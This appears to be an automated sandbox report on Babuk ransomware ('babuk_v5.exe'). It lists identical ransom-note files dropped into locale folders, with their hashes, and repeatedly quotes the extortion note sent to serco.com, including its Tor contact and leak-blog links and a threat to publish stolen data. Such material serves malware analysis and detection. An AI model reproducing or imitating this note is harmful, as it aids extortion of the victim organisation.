                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\nb-NO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\nl-BE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\nl-NL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\pl-PL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\pt-BR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\pt-PT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ro-MD\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ro-RO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ru-RU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sk-SK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sl-SI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sq-AL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-BA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-ME\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-RS\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-BA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-ME\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
